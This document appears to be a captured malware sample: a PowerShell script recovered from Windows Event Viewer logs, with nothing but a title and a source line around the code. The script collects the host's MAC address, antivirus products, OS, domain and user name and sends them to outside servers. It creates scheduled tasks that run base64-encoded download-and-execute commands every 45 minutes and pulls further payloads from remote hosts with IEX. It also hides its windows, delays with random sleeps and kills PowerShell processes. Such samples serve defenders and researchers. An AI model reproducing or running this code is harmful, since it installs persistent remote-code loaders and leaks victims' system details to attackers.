Malicious PowerShell

# Extracted from EventViewer (Event ID: 4104)
[string]$av = ""
[string]$avs = ""
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
$av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
if(-not ($mac -match '^[\da-fA-F-]*$')){
[string]$mac = "00-00-00-00-00-00"
}else{}
[System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
$permit =  ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$status = '|'
$path = "$env:temp\\kkk1.log"
[string]$flag = test-path $path
$path2 = "$env:temp\\kill.log"
[string]$flag2 = test-path $path2
try{
    $name = 'Global\powerv5'
    $psflag = $flase
    New-Object System.Threading.Mutex ($true,$name,[ref]$psflag)
}catch{}
try{
    $name2 = 'Global\powerdv5'
    $dflag = $flase
    New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag)
}catch{}
$dt = Get-Date -Format 'yyMMdd'
$key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
if($flag -eq 'False'){
    New-Item $path -type file
    try{
        if($permit){
            $status += 'PHig|'
            $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
            $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
            $bcode = [Convert]::ToBase64String($Bytes)
            $ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
            &cmd.exe /c $ccc
        }else{
            $status += 'PLow|'
            $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
            $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
            $bcode = [Convert]::ToBase64String($Bytes)
            $ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
            &cmd.exe /c $ccc
        }
    }catch{}
}else{}
try{
    $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
    IEX (New-Object Net.WebClient).DownloadString("$download")
}catch{}
try{
    if($psflag){
    $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
    Start-Process -FilePath cmd.exe -ArgumentList "$onps"
    }else{}
}catch{}
try{
    if([IntPtr]::Size -eq 8){
        $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
    }else{
        $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
    }
    if($dflag){
        Start-Process -FilePath cmd.exe -ArgumentList "$dglink"
    }else{}
}catch{}
[System.Threading.Thread]::Sleep(3000)
if($flag2 -eq 'False'){
    New-Item $path2 -type file
    Stop-Process -Force -processname powershell
}else{}